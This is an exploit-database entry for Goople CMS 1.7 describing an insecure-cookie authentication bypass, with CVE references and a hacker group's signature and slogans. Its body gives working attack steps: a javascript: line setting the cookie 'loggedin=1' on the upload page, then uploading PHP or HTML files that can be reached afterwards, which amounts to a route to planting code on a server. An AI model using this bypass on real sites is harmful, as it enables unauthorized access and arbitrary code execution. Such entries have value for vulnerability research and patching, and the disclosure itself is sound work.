Goople CMS 1.7 - Insecure Cookie Handling

Author: BeyazKurt
type: webapps
platform: php
port: 
date_added: 2008-11-22  
date_updated:   
verified: 1  
codes: OSVDB-50267;CVE-2008-6119;OSVDB-50266;CVE-2008-6118  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7205.txt  

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
#
# Exploit :
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                       Rinia ShqiptaRe  :)
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#######################################################

# milw0rm.com [2008-11-23]